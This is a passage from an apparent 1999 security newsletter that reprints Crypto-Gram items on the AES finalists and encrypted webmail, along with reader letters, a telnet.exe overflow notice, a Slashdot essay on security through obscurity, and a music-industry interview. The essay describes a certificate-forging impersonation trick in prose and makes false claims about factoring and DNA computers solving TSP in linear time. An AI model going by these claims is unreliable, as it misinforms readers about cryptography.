And one last Microsoft item. To help salvage their reputation, Microsoft
put a server running a beta of Windows 2000 outside its firewall and dared
hackers to break in. The problem was that the server couldn't stay up long
enough for anyone to even try.
http://www.zdnet.com/zdnn/stories/news/0,4586,2309474,00.html?chkpt=hpqs014
http://www.windows2000test.com/
** *** ***** ******* *********** *************
Counterpane Systems News
Counterpane Systems has changed its name to Counterpane Internet Security,
Inc. We have received venture-capital funding from Accel Partners and
Bessemer Ventures, and are in the process of creating a series of service
offerings in the managed security area. Anyone interested in working for
Counterpane in the Bay Area should contact me immediately. Watch this
space for more details. This is going to be the coolest security company
you've ever seen.
PasswordSafe wins PC Magazine editors choice award:
http://www.zdnet.com/pcmag/stories/reviews/0,6755,2311193,00.html
Bruce Schneier profiled on guru.com:
http://www.guru.com/profiles_schneier.html
Microsoft PPTP's vulnerability discussed:
http://www.zdnet.com/sr/stories/news/0,4538,2293711,00.html
Bruce Schneier will be speaking at the Scandinavian Network Expo, in the
evening on 14 September and then on 15 September
http://www.networkstelecom.com/index_eng.html
http://www.firedoor.se/bruce/bruce.var
** *** ***** ******* *********** *************
NIST AES News
AES is the Advanced Encryption Standard, the encryption algorithm that will
eventually replace DES. In 1997, the U.S. government (NIST, actually),
solicited candidate algorithms for this standard. By June 1998 (the
submission deadline), NIST received fifteen submissions. NIST asked for
comments on these algorithms, with the intention of pruning the list to
five finalists. NIST held an AES conference in Rome in April (this was the
second AES conference, the first was the previous August in California),
the comment deadline was in June, and last Monday NIST announced the finalists.
They are:
Mars, submitted by a large team at IBM.
RC6, from RSA Data Security (including Ron Rivest)
Rijndael, from a team of excellent Belgian cryptographers
Serpent, by three very respected cryptographers, Ross Anderson,
Eli Biham, and Lars Knudsen
Twofish, from Counterpane Systems, including myself
NIST didn't just announce the five finalists. They published a 52-page
report explaining their rationale -- why they chose the algorithms they did
and why they did not chose the algorithms they didn't -- and it is worth
reading to peek at their decision process. It's at
http://csrc.nist.gov/encryption/aes/round2/round2.htm#NIST
The next step is to choose among the finalists. NIST is again soliciting
comments on the algorithms, and there will be a third AES Candidate
Conference in New York in April 2000, held in conjunction with the 7th Fast
Software Encryption workshop. Comments are due by 15 May 2000, and then
NIST will propose a standard. The AES will then go through the formal
government approvals process and become a Federal Information Processing
Standard (FIPS), and presumably will become the standard encryption
algorithm for all sorts of international applications. Expect all this to
happen by the summer of 2001; the government moves slowly.
Cryptographers are busily analyzing the submissions for security. It's
tempting to think of the process as a big demolition derby: everyone
submits their algorithms and then attacks all the others...the last one
standing wins. Really, it won't be like that.
At the end of the analysis period, I don't expect serious weaknesses to be
found in any of the finalists. The winner will be chosen based on other
factors: performance, flexibility, suitability.
This means that we need your input into this process. I know you're not
cryptographers, and you won't be able to comment on the mathematics of the
various submissions. But you can comment on your encryption requirements,
and whether the algorithms will suit your needs.
AES will have to work in a variety of current and future applications,
doing all sorts of different encryption tasks: 32-bit microprocessors,
64-bit microprocessors, small 8-bit smart cards, DSPs, FPGAs, custom ASICs,
and everything else we can't even imagine yet.
Choosing a single algorithm for all these applications is not easy, but
that's what we have to do. It might make more sense to have a family of
algorithms, each tuned to a particular application, but there will be only
one AES. And when AES becomes a standard, customers will want their
encryption products to be "buzzword compliant." They'll demand it in
hardware, in desktop computer software, on smart cards, in
electronic-commerce terminals, and other places we never thought it would
be used. Anything we pick for AES has to work in all those applications.
So how do you comment? NIST is accepting formal comments either on paper
or by email. See http://www.nist.gov/aes for instructions. Be sure to
identify who you represent and what cryptography interests you have.
Remember, AES is going to be your cryptography standard for the 21st
century. We need your help.
NIST Round 2 page:
http://csrc.nist.gov/encryption/aes/round2/round2.htm
FSE 2000:
http://www.counterpane.com/fse.html
Performance comparison of AES candidates:
http://www.counterpane.com/aes-performance.html
A version of this essay appears at:
http://www.zdnet.com/zdtv/cybercrime/features/story/0,3700,2312895,00.html
** *** ***** ******* *********** *************
The Doghouse: HPUX and the UNIX Crypt Algorithm
Here is a comparison of the Solaris and HPUX man pages for the UNIX "crypt"
encryption function. Same algorithm, different interpretations, different
conclusion.
According to the Solaris 2.6 Crypt man page, "crypt implements a one-rotor
machine designed along the lines of the German Enigma, but with a
256-element rotor. Methods of attack on such machines are widely known,
thus crypt provides minimal security."
According to the HPUX10.20 man page, "crypt implements a one-rotor machine
designed along the lines of the German Enigma, but with a 256-element
rotor. Methods of attack on such machines are known, but not widely;
moreover the amount of work required is likely to be large."
Reading the HPUX man page, you get the impression that crypt offers
adequate protection for your files. It is a sad statement when
cryptographic algorithms that are broken as homework for cryptography
students are put forward as a means to protect data by a mainstream OS vendor.
** *** ***** ******* *********** *************
Web-Based Encrypted E-Mail
The idea is enticing. Just as you can log onto Hotmail with your browser
to send and receive e-mail, there are Web sites you can log on to to send
and receive encrypted e-mail. HushMail, ZipLip, YNN-mail, ZixMail. No
software to download and install...it just works.
But how well?
HushMail <http://www.hushmail.com> is basically a PGP or S/MIME-like e-mail
application that uses Java (although oddly enough, HushMail is not
compatible with either). The sender logs onto the HushMail Web site, and
encrypts messages using a Java applet that is automatically downloaded onto
his machine. Both the sender and receiver need to have HushMail accounts
for this to work. Accounts can be anonymous.
The algorithms are 1024-bit ElGamal for key exchange and signatures, and
Blowfish for bulk encryption. But everyone's private key is stored on the
HushMail server, protected in a passphrase. This means that one weak link
is likely to be the passphrase; it's the only protection you have against
someone who has legal or illegal access to the HushMail server. (The
current beta -- August 99 -- doesn't let you change your passphrase,
although they promise the feature in the future.)
Another weak link is the Java applet. When you download it, you have no
idea if it is the correct applet. Yes, the source code is public, but that
doesn't help when you are at a public Internet terminal trying to encrypt
or decrypt private e-mail. A Trojaned Java applet can do all sorts of
damage, and there is no way to know. Sure, you use an SSL connection
between your computer and the HushMail server, but if you don't actually
check the details of the received certificate, you have no idea who you are
connected to. HushMail is considering writing something to verify the
applet automatically, but then how do you trust the verifier?
This is actually a major problem. The applet can be signed, but who signed
it? Even if you check the certificate, the typical browser permits a dozen
different PKI roots by default, and any one of them can issue a forged
certificate. This means you have to trust them all. And you have to trust
that a Trojan didn't drop a phony certificate into your browser. Note that
a downloaded verifier can never solve this problem; it just turns the "how
do I trust the applet" question into "how do I trust the verifier."
And a third possible weakness is the location of the HushMail servers.
Although the company is based in Antigua, the servers are located in
Canada. Presumably Canada is more susceptible to legal attacks. And
remember that the security depends on the physical protection of the
HushMail server.
All in all, though, HushMail seems like a reasonable implementation of the
idea. The company seems clued; they have a reasonably informative Web
site, and respond promptly to security questions.
ZipLip <http://www.ziplip.com> is different. Both parties do not need an
account to communicate. The sender logs onto the ZipLip Web site and,
using SSL, sends a message to someone else. ZipLip then sends the
recipient a message telling him that your message is waiting. The
recipient then logs onto ZipLip to receive the message. Encryption,
outside the two SSL connections, is completely optional.
ZipLip won't identify the encryption algorithm used, which is enough to
discount them without further analysis. But they do something even
stupider; they allow the sender to create an encryption key and then give
the recipient a "hint" so that he can guess it. ZipLip's own Web site
suggests: "The name of the project we're working on," or "The restaurant
where we had dinner last night." Maybe there are 100,000 restaurants, so
that's a 17-bit key.
The threats here are serious. Both the sender and receiver need to verify
their SSL connections, otherwise there is no security. The ZipLip server
is a major attack target, both because many messages will not be encrypted,
and because those that are will have keys weakened by the requirement that
both parties remember them.
On the plus side, ZipLip claims a policy of deleting all mail 24 hours
after delivery, which provides a level of lawyer-proofing that HushMail
does not have...if they implement it properly.
YNN-mail <http://www.ynnmail.com> is barely worth this paragraph. They
encrypt stored messages with a 40-bit key, and don't use SSL when you sign
up and send them a long-term password. Snake-oil if I've ever seen it.
And I just heard of another, ZixMail <http://www.zixmail.com/>. I didn't
have time to examine it in depth, but the FAQ -- look at their wishy-washy
comments on encryption -- makes it sound like real snake oil, too.
Web-based encrypted e-mail is less secure than PGP-encrypted e-mail (or
S/MIME e-mail) for a few reasons. One, the constant interaction between
the communicants and the server leaves more opportunity for
man-in-the-middle attacks, Trojan horses, etc. Two, SSL-based
authentication is more vulnerable to spoofing, since almost no one ever
bothers to check the details of received certificates and there is no
revocation mechanism in place. And three, there are some very attractive
attack targets: servers with large collections of secret e-mail and
potential decryption keys. Certainly Web-based encrypted e-mail is better
than unencrypted e-mail, but I'd stick with PGP or S/MIME if possible.
This essay was written with input from Fred Wamsley.
A version of this essay appears at:
http://www.zdnet.com/zdnn/stories/comment/0,5859,2314064,00.html
** *** ***** ******* *********** *************
Comments from Readers
From: "Couvares, Peter F." <peter.couvares@tdstelecom.com>
Subject: Crypto-Hacking
For all it's worth, it looks like you were beaten to the punch -- I can
find at least four prior uses of "crypto-hacking" or "cryptohacking".
Google turned up the following, among others:
http://cc2.gamestats.com/wwwboard/messages/894.html
http://www.hotwired.com/talk/club/special/transcripts/96-03-13.levy.html
All of them seem to use it to mean hacking a system that employs
cryptography rather than hacking cryptography itself, however -- your
definition is a more useful contribution to the vocabulary.
From: John Savard
Subject: Cluelessness Alert. I'm not so sure.
I certainly do agree that the military can safely allow public information
to be stored on Web sites on commercial hosts. However, I have noted that
a lot of military sites are actually on U.S. Government-owned machines in
the .mil domain.
And it is difficult, particularly using common commercially-available
operating systems and Internet hosting software, to maintain the kind of
impregnable security needed for any system that also contains sensitive
information.
There are ways of making an Internet server essentially immune to most
kinds of hacking. Macintosh servers, not having a CLI, appear to be quite
secure. But there are other techniques, most of which require custom
software and even custom hardware.
For example, to take an idea from the telephone company, how about a
computer with two CPUs. CPU number 1 is connected to the hard drive
containing the software for the computer, and has read-write access to all
of RAM. CPU number 2 is the one connected to the network. It has
read-only access to the chunk of memory from which it runs programs. But
it has read-write memory for storing data, and read-only access to a hard
drive containing the Web site it is to present to the Internet. If it also
has data to store, it gets write access to a hard drive for that purpose.
The access is determined by *hardwired connections*, not by operating
system privileges which can be subverted.
In most operating systems, either the Microsoft ones or the Unix clones,
networking is part of the operating system, and the TCP/IP connection to
the Internet is part of that network. It has to be explicitly limited in
its privileges, and if someone gets Administrator privileges/root access,
that can be overturned. That shouldn't happen, but any bug in the OS is a
possible back door.
Now, suppose instead that the OS didn't even HAVE networking in it. The
port connected to the Internet was something the OS didn't even know about,
and everything that port did was under the control of one unprivileged
*applications program*. Even if the OS didn't even have security -- say it
was MS-DOS -- with precautions against such attacks as buffer overrun, an
applications program with narrowly focussed capabilities could be quite secure.
If one doesn't go to these kinds of lengths, though, while it is true that
constant vigilance and the use of more conventional security methods (i.e.
firewalls) can give "pretty good" security, I think the Pentagon is
entirely justified in taking the attitude that the kind of *ironclad*
security they need just isn't available if one connects to the Internet.
I'm quite sure that the NSA or whoever could come up with a
"super-firewall" that could act as a public Web-site host, and yet be
updated from within a highly sensitive computer network, with safety. But
it would take technologies like the two-CPU sketch above, which just aren't
available off the shelf. And it's off-the-shelf technologies that have
been used for much of the military's Internet presence.
So while it is true there is a way for the military to stay on-line and
maintain security, it is also true that that is not immediately available.
Taking some Web sites off-line until the vulnerabilities can be remedied
isn't a silly policy, even if there may be some individual examples of
cluelessness where sites involving no exposure are taken down.
From: dragon@revealed.net
Subject: Re: Major cluelessness alert
I just read your blurb on the Army's consideration of pulling off of the
net, and I felt I had to comment. In particular, I disagree with the page
which you felt had "a good analysis of this idiotic idea".
While I agree that a simple knee-jerk reaction to shut off the Internet
connection just because X company did so is not prudent, I do believe that,
in an organization with an educated security staff, there is a place for a
temporary shut-down of the connection. In particular, I was involved in
making this decision for one of the companies I work with, and we were
concerned with two points: 1) since Melissa was propagating via e-mail with
little human intervention, we decided to cut off access until we had gotten
enough control on our internal population to not propagate to our business
partners in the way that other large companies had done to us, and 2) to
give our admins the breathing room to be able to rationally understand what
the impact on our production systems were and to implement the
updates/fixes that were coming to us from our suppliers.
I don't know how anyone can say that it's idiotic to disconnect from the
Internet when in the face of an attack which is both significant in scope
and relatively unknown in implementation. Yes, it could be considered to
be paranoid, xenophobic, and reactionary, and it's true that it is not
necessarily any safer to be connected on any other day, but to deny a
security staff the ability to raise the drawbridge until the immediate
threat is at least understood hoodwinks us to the point that we won't
really be able to function.
Finally, I have to say that I agree with at least a part of the military's
decision to pull back. The one thing that they mentioned was that they
were attempting to correct the positioning of sensitive data. There is a
lot of information, military or otherwise, that has no place on the public
Internet. The running joke in our department is that the only secure
computer is one that is powered off, melted into slag, encased in concrete,
and buried at the bottom of the ocean. Your own writings show that not
even cryptography is completely reliable due to advances in mathematics and
side-channel attacks. There are many, many circumstances where the
sensitivity and criticality of data demands location on a network that is
air-gap protected from others, whether those other networks are the public
Internet, less-secure Intranets, or private WANs connecting to suppliers
and dealers. The real idiocy is placing data which needs to be kept secure
on machines which are accessible via public, or near-public, channels.
From: Jon Williams <dragon@revealed.net>
Subject: Cracking Encrypted ZIP files
Regarding encrypted ZIP file cracking:
While brute forcing the password may work most of the time for most people
and take less time, there is also a known-plaintext attack, which only
requires 13 known bytes. Check out
http://www.unix-ag.uni-kl.de/~conrad/krypto/pkcrack.html for a whitepaper
describing the attack and working software. I've successfully used this.
From: "David Brownell" <david-b@pacbell.net>
Subject: SSL at Wells Fargo
Wells Fargo's on-line banking site is still using SSL v2 ... doesn't
support browsers configured to use more secure versions (v3, TLS) and has
even rejected SSL v2 connections that don't use RC2 (deprecated). I'm sure
you understand the SSLv2/RC2 issues, even when 128-bit keys are in use;
they're just not as strong as other protocols/ciphers, at least for the
front-door sorts of attacks that were NOT your point.
The "simple" bungle on their site, however, is that if you've adopted a
policy that you're not going to use SSLv2 for "secure" transactions, the
Wells Fargo site says to you that your browser isn't secure enough, and you
need to get a 128-bit browser. Doesn't say "you must enable an obsolescent
version with a dubious cipher" ... which it could say, very easily. It
says something completely wrong.
That was a useful collection of basic bungles. Don't forget the other
type, using an HTTPS page that's got sensitive data in query params for its
URL, and an http://... link that'll cause that sensitive data to be logged
in what are usually insecure logfiles. (No current examples handy -- but
if you see one of those, it's classic!)
From: David Crick <dacrick@cwcom.net>
Subject: SSL at BT
British Telecom (BT) are another company with worrying views on Internet
security. You'd think with their image and standing that they could do better.
Their e-services Web page [www.bthome.com/e_services/index_sh.html] allows
home users to check and amend various account details and services.
But despite the spread of strong crypto Web-browsers [www.opera.com] and
security upgrades for IE, Windows and Netscape [www.replay.com], BT only
chose to use 40-bit SSL.
This is accompanied by the following endorsement and warning:
"When ordering goods and services make sure the Web site you are using uses
a 'Secure Socket Layer (SSL)' session. The BT Shop - At Home uses such
sessions from the moment you start to place an order."
Also: "If you are still uneasy about using the Web to order on-line then
you should use an alternative method of ordering."
Hardly inspiring, is it?
It also makes one dubious about their "Secure Site Programme":
"Trustwise Secure Sites use a BT Secure Server certificate to establish
proof of identity of the owner of the Web site and enable secure
communication between the Web site and visitors to that site.
"BT carefully checks the identity of the organization that owns the Web
site and verifies that the Web site is registered to that organization.
The BT Trustwise Secure Site Programme allows you to learn more about the
Web sites you visit before you submit any sensitive or confidential
information."
Again, I could only find 40-bit SSL in operation, despite the "Trustwise"
logo [e.g. see http://www.bt.com/Talk/].
From: Ross Anderson <Ross.Anderson@cl.cam.ac.uk>
Subject: AES
NIST has just announced that the finalists in the Advanced Encryption
Standard competition are MARS, RC6, Rijndael, Serpent and Twofish. That
makes three U.S. algorithms, one Belgian, and one which I developed in
collaboration with colleagues in Israel and Norway.
It may be of interest that, under the export controls on intangibles which
England's DTI pushed in their recent White Paper and which they are now
trying to have adopted as an EU regulation, I would have needed a personal
export licence from the DTI in order to do this work.
It seems somewhat unlikely that a licence would have been granted. Arms
exporters complain to me that DTI officials are notorious for blocking
licences to punish them for such 'offences' as complaining about the
licensing process. So perhaps I would have not done the work; perhaps I'd
have defied the law and now be involved in a huge test case in the European
Court; perhaps I'd have emigrated; perhaps we'd just not do research in
collaboration with foreigners. Who knows?
** *** ***** ******* *********** *************
CRYPTO-GRAM is a free monthly newsletter providing summaries, analyses,
insights, and commentaries on cryptography and computer security.
To subscribe, visit http://www.counterpane.com/crypto-gram.html or send a
blank message to crypto-gram-subscribe@chaparraltree.com. To unsubscribe,
visit http://www.counterpane.com/unsubform.html. Back issues are available
on http://www.counterpane.com.
Please feel free to forward CRYPTO-GRAM to colleagues and friends who will
find it valuable. Permission is granted to reprint CRYPTO-GRAM, as long as
it is reprinted in its entirety.
CRYPTO-GRAM is written by Bruce Schneier. Schneier is founder and CTO of
Counterpane Internet Security Inc., the author of "Applied Cryptography,"
and an inventor of the Blowfish, Twofish, and Yarrow algorithms. He served
on the board of the International Association for Cryptologic Research,
EPIC, and VTW. He is a frequent writer and lecturer on cryptography.
Counterpane Internet Security, Inc. is a venture-funded company bringing
innovative managed security solutions to the enterprise.
http://www.counterpane.com/
Copyright (c) 1999 by Bruce Schneier
ISN is sponsored by Security-Focus.COM
@HWA
10.0 TELNET.EXE HEAP OVERFLOW
~~~~~~~~~~~~~~~~~~~~~~~~
From http://www.net-security.org/
by BHZ, Tuesday 17th August 1999 on 10:51 pm CET
Jeremy Kothe reported to BugTraq about Heap Overflow in windows 98 Telnet.exe.
"This version of Telnet (77824 bytes, 11th May 98) has a bug which allows a heap
overrun. It assumes that the first command-line argument will be <255 chars when
preparing for the "Connect Failed" message-box. The result is that a few crucial bytes
can be written over, which, as the telnet app is closing, allow full execution of
arbitrary code". Read the details here. Valentin Perelogin also posted that
Windows'95 telnet.exe (74,720Kb) is also exploitable.
@HWA
11.0 SECURITY THROUGH OBSCURITY VS FULL DISCLOSURE
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From http://www.net-security.org/
by Thejian, Tuesday 17th August 1999 on 9:30 pm CET
This Slashdot feature deals with two views on security, security through obscurity,
which relies on the ignorance of attackers rather than the strength of defenders and
the opposing full disclosure approach. This paper suggests security through obscurity
can and does work in certain strictly limited ways, and should not be eliminated
unthinkingly from the admin's arsenal. It further implies that the boundaries between
STO and 'real' security are blurry and deserve evaluation. Interesting reading to say
the least. Complete story
http://slashdot.org/features/99/08/17/1327246.shtml
Obscurity as Security
Posted by CmdrTaco on Tuesday August 17, @10:00AM EDT
from the saaay-wait-a-minute dept.
Matthew Priestley has taken a break from slaving for the man to write us a piece where he takes on the
convential wisdom that Security through Obscurity isn't secure at all, and tries to argue that sometimes it
is. The following was written by Slashdot Reader Matthew Priestley
Disclaimer: The author of this paper works for Microsoft, but his opinions may not be those of Microsoft. In
fact, they aren't. The author hereby declares that nobody important is even aware of his existence and that
the closest he has ever come to plotting with Bill Gates on the Master Plan was when they used adjacent
urinals this one time. The author did not peek.
0 Introduction
With the popularity of the open-source mindset, a general contempt has drizzled upon all forms of obscurity. The
concept of security through obscurity (STO) in particu lar has been decimated. Security through obscurity, which
relies on the ignorance of attackers rather than the strength of defenders, is dead in all but practic e. The victory of the
opposing full disclosure approach is so complete that proposed ta ctics die at the mere hint they are a form of STO.
This paper suggests security through obscurity can and does work in certain strictly limited ways, and should not be
eliminated unthinkingly from the admin's arsenal. It further implies that the boundaries between STO and 'real' security
are blurry and deserve evaluation. However, this paper in no way proposes obscurity as a method for keeping
secrets in the long term.
1 Full disclosure does not apply to instantiated data
Instantiated data - the data used by specific instances of an algorithm - do not fall within the scope of full disclosure.
Were this not so, then even the simplest password would violate the ban on security through obscurity. Passwords
are secrets known only to their creators, and password entry is commonly obscured, as in the case of the 'shadow'
login of UNIX. While the login protocol may be open, passwords themselves are a form of STO, with obscurity
localized in the password string.
Instantiated data are exempt from full disclosure because the risk from their failure is limited. When a script cracks a
password, the damage done to the secure system extends only as far as that password's scope. The cracker cannot
use the compromised string to gain power directly in another system, even if that system runs the same password
protocol. Nor can anything be inferred about the value of one password merely from the value of another with equal
or lower permissions.
A similar example of instantiated data obscurity is the private key that forms the basis of asymmetric cryptography.
So obscure is this information that it is rare for even the owner to be familiar with its precise value. But such obscurity
is a necessary element of modern security schemes. Strong security does not eliminate obscurity - rather, it localizes
obscurity to instantiated data. The phrase in cryptology, 'carry all security in the key' might be better phrased 'carry all
obscurity in the key'.
2 Full disclosure does not apply to time-limited secrets
Secrets that expire after a short lifetime can be protected by a wider array of techniques than long-standing secrets.
The defense of information that will be irrelevant in a matter of hours or days may not warrant fully peer-reviewed
security. Consider the famous Navajo code-talkers of World War II. Among the Americans coordinating the at tack
against Japanese-held islands in the Pacific were a number of Navajo Indians, who spoke a slangy version of the
complex Navajo tongue. Commands from HQ were issued through these code-talkers, who encrypted and
decrypted with an alacrity that belittled the automated methods of the day. This is an excellent example of time-limited
security through obscurity. Secret languages are excellent security in the short-term, but however cryptic Navajo may
be, it is a code subject to human betrayal. Use of Navajo against the Japanese much beyond the 3-year window of
the war would have been unwise. But because the secrets of American strategy in the Pacific were irrelevant after the
conclusion of the fighting, the long-term weakness of obscure Navajo as a security measure was unimportant.
3 Obscurity serves as a tripwire
Perhaps the classic example of wrongheaded STO is the administrator who modifies his web server to listen on a
nonstandard port - thereby confusing attackers, as the theory goes. Considering the degree to which tasks such as
port scanning can be automated, the naivete of this defense seems plain. The cracker might be forced to check all
64512 unreserved ports, but eventually the concealed web server will be found. This appears to be a weakness of
STO, but if manipulated correctly, it is in fact a great strength. Imagine that our same admin had also invoked a
tripwire script and set it to listen on one or more unused ports. When the tripwire is probed with a SYN packet from
a cracker trying to locate the web server, instantly the system goes to full alert. The packet is logged and the admin's
pager sounds like an alarm.
Such tripwire approaches work because they do not expect obscurity to keep information hidden. Rather, they
obscure information as a ploy to force invaders into showing their hand. Because the obscured implementation differs
on each system, crackers must resort to guess-check scanning before attacks can commence. But tripwires are
deployed throughout the system, anticipating this very move. Running an automated kit suddenly becomes a risky
proposition, and even talented crackers must gamble on, for example, whether 'root' is really the name of the primary
account or merely a hotline to the authorities.
Lighthearted implementations of this approach are a staple in the popular "Indiana Jones" films. In one scene, Jones is
confronted with a hallway of lettered tiles, all seemingly alike. To cross safely he must step only on those tiles with
letters corresponding to the secret word 'Jehovah'. The penalty for a misstep is to crash through the floor and
plummet into a gaping pit. Attackers not privy to the password would find an exhaustive search less than optimal in
this case. When traps are mingled with genuine data, STO can be a powerful disincentive. Such measures do not
make a given machine resistant to breach in the long term, any more than medieval moats could ultimately protect
their castles. But like moats, tripwire obscurity provides a critical buffer against attackers, allowing defenders room to
breathe.
4 Asymmetric cryptography exhibits traits of STO
Despite the notion that asymmetric cryptography such as RSA is 'real' security, in some aspects these methods
resemble STO. Indeed, this entire class of cryptography is founded on the hopeful guess that a certain mathematical
problem is intractable. The back door into cryptographic methods that rely on multiplying primes is, quite simply, to
develop a swift means of factoring those multiples. This NP-time problem must be solved before a private key can b
e derived from its corresponding public key, and the notorious difficulty of NP problems leads some supporters to
characterize asymmetric cryptography as 'prova bly secure'. This is far from the case - there is uncertainty among
mathematicia ns as to whether this problem will even prove non-trivial once approached from t he right angle.
Startling progress has been made in solving similar 'impossible' problems using innovative ploys - for example, DNA
computers can now solve the Traveling Salesman problem in linear time. Given that asymmetric encryption is used
widely in the world's e-commerce infrastructure, the repercussions when this piece of obscurity is cracked are
disturbing to contemplate.
One telling argument against STO is that it promotes a false sense of security, leading admins into complacency. But
the complexity of asymmetric cryptography, combined with reports of its infallibility, can produce much the same
effect. Co nsider this social-engineering exploit of digital signing. Using a tool such as m akecert, the cracker
generates a root certificate with the name 'Verisign Class 1 Primary CA' and uses it to sign an end-entity certificate
with the subject 'CN=Rob Malda, E=malda@slashdot.org' (CT:Please don't. I'm used to posers pretending to be me
in Quake, but not on email ;) The cracker then sends the email to an enemy, using a client that does not validate
e-mail addresses and spoofing the return address friendly name. The inexpert recipient, thinking all is in order and
knowing that digital signatures never lie, trusts the root certificate and hence forth carries on a conversation with a
false CmdrTaco. Only scrutiny of the headers will reveal the mail is actually going to a different address. The widely
made claim that public-key cryptography is 'real' security and completely unrelated to 'false' STO delivers a more
powerful illusion of security than anything an XOR'd password file can provide.
Even brute-force cryptanalysis has parallels in STO. Suppose we wish to conceal the passwords for a number of
Swedish bank accounts. We resolve to write them to a secret location on our hard drive, perhaps a few unused bytes
in a file sector. Only we, who know the lucky offset, can read the data. This form of concealment is a typical case of
secruity through obscurity. The integrity of our secret depends on the ignorance of the cracker, and a trial of all 2^n
possible locatio ns compromises the system. But in what way is this fundamentally different from the 'genuine' security
of n-bit encryption? To break this form of security, 2^n keys are generated and tried agains t the cipher text until the
result is a plain body. Is the difference between this 'true' security and the 'false' STO merely than n is considerably
larger in encryption than in the case of hard drives? But this implies that our real error lay, not in reliance upon
obscurity, but in having a hard drive of insufficient size!
5 Conclusions
Security in the absence of obscurity is not strictly possible, but good systems both localize and advertise their points
of obscurity. When the admin is fully a ware of the obscurity in a system, tripwires and instantiated data can provide a
useful complement to more rigorous security techniques. Obscurity cannot keep information safe or concealed for
long, but it can make attacks risky and destroy the effectiveness of automatic kits. These benefits should not be
dismissed as an article of faith.
@HWA
12.0 THE MUSIC INDUSTRIES' "CYBER-SHERRIF"
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From http://www.net-security.org/
by Thejian, Tuesday 17th August 1999 on 9:00 pm CET
The growing number illegal MP3 copies of copyrighted songs that are distributed
across the Net is becoming an increasingly big problem for the music industry. Here's
an interview with RIAA Executive Director Hilary Rosen on this matter. Read the
interview below
http://www.businessweek.com/bwdaily/dnflash/aug1999/nf90817b.htm
Music and the Net: A Chat with the Industry's Cyber Sheriff
RIAA Executive Director Hilary Rosen sings a tune you might not expect
"When the music's over, turn out the lights" crooned the Doors' Jim Morrison some 30 years ago. Today, the
dirge is a fitting take on how Net pioneers regard the lumbering record industry, which they almost giddily
hope will be toppled by the Web's ability to sort and transmit digital music for sale online. In recent months, the
industry's vulnerability has been underscored by the stunning growth of MP3 files -- many of which are record
companies' own copyrighted songs uploaded sub rosa onto illegal trading posts.
The record companies have a sheriff, of course. She's Hilary Rosen, long-time executive director of the
47-year-old Recording Industry Association of America. While the industry undergoes painful, and sometimes
enlightening change, it's Rosen's responsibility to keep order. The hastily formed Secure Digital Music
Initiative, for instance, is an effort by the major record and technology companies to stop illegal duplication of
copyrighted material. Beyond this squabbling over standards, Rosen must also help record companies confront
a larger question: Will they even matter 20 years from now? Looking for answers, Business Week staff editor
Dennis Berman chatted with Rosen recently. Here's an edited transcript of their conversation:
Q: How would you describe the state of mind of a big chunk of your consumers, namely young
people who are growing up on the Internet, where so many of the products and services are free?
A: I don't think the concept of music being free is new. I think the shift is how
consumer expectations of getting products through the Internet has built up as
a free activity. But I actually don't think it's as big a problem as some people
might expect me to think. We know consumers want music. And we know
they want it online, and I'm grateful to the MP3 phenomenon for showing the
music community just how badly [consumers] do want it.
They're willing to spend all that time and energy to download in the most
difficult, complex, time-consuming, incompatible ways. I mean, have you downloaded MP3 files? It's a pain.
It's not really easy. It's hard to choose the thing, you don't really get the sample. It's not easy.
So if they're willing to go through that much trouble to get music, I'm completely convinced that if an artist
offers them a fresh version of the highest sound quality with the lyrics packaged, then consumers want to pay
for that. It will be easy, it will be compatible.
Q: What business lessons do you think record companies -- habitually criticized as being slow and
lumbering and profiteering -- have learned from the Internet?
A: I think No. 1 would be that record companies were traditionally forced into the box of seeing the retailer as
their customer, because the retailers bought the records and then sold them to the consumer. Whereas, the
Internet has given both the record companies and the artists a direct relationship with their fans. That's
probably the most significant thing.
We have a small member company label called Astralwerks. It's a great label, great energy. Their relationship
with the Chemical Brothers [a techno group] is so intense that they now have their marketing plan for the new
Chemical Brothers release suggested to them by the fans whom they have Web relationships with.
Gimmick, yes, but extraordinarily appealing. [Now] people communicate
with you about real research, not just a bunch of guys in gray suits telling you
what they perceive their phone bankers have learned -- but real research.
So, I think that's No. 1 -- that it is fundamentally changing the relationships
that exist between the music consumer and the providers of the music.
I think one other thing, and that is the sort of value equation about music use. It used to be that there was one
business model, they sold records. So, all of their investment and marketing or promotion and tour support,
and whatever they did with an artist, had to be made up in a record sale. With the Web, you have the
opportunity for a real variety of business models, driven by the consumer. That means you don't have to make
a million dollars selling the whole album.
If you make $100,000 here selling the album, and $100,000 dollars in licensing fees for a track on an online
jukebox, and then another $100,000 doing your licensing for a Webcast, then the multiple revenue streams
really allow you to take a lot more risks -- on music that might not otherwise be as profitable, and that you
wouldn't, therefore, take the risk on.
Q: What do you worry most about?
A: I think it's interesting how labels can sustain major artists' increasing desires -- and deserved desires -- for
more and more money, with limited capitalization in some of the more entrenched companies. And I guess it's
sort of how do you get the infusion of cash that you need, and then, what do you do with that cash?
Q: How do you feel about losing the suit against Diamond Multimedia [the first company to develop
a mobile player for MP3 files. The RIAA sued Diamond, claiming that its technology allowed for
illegal use of copyrighted material.]
A: Somebody asked me if we'd bring the Diamond suit again. As recently as 18 months ago when this suit was
brought, the whole world was different.
Q: How was it different?
A: The technology industry didn't come to the table with any level of understanding for the creative community
-- that the products were being considered as ways to exploit the music, not expand it. At the time, it was the
best judgment call that was made, that we could make.
Q: So, you regret it now?
A: No. What I regret is that it sends a signal about our attitude, which I think is incorrect. It was never the
strategy, it was just a part of the strategy. Concepts like SDMI and bringing people together has always been
the strategy. And the RIAA, unfortunately, jumped out of the box there.
Q: One thing that seems to be missing is artists' involvement. Artists saying, "Hey, you know, we
put out this music that means so much in your life, we deserve to be paid for it. We certainly don't
deserve to be ripped off." Why don't we see more artists making those statements?
A: I think artists don't like to be perceived as getting into controversy -- they're about their music, they're
about their relationships with their fans. I think that given the way that this was positioned in the press over the
last two years -- artists vs. fans, artists vs. record companies -- anytime somebody said something, they were
taking sides. I think that has been tough.
But I will tell you, I get calls from artists and managers every day asking us to
take stuff off a Web site. If artists were every day telling me, "You know, we
don't believe in what you're doing, we think this should all be free. We don't
care about our stuff being protected," I'd go find another job. They don't, as
a rule, feel that way. As a rule, they pretty much feel like they should get
compensated.
Artists, a lot of artists, deserve to be, need to be, want to be seen as technology-friendly. And I think if we can
provide a safe space for them to be able to do that and still protect their interests, that's O.K..
Q: If you had to draw a pie chart of how you spend your time, I guess the Internet is taking a bigger
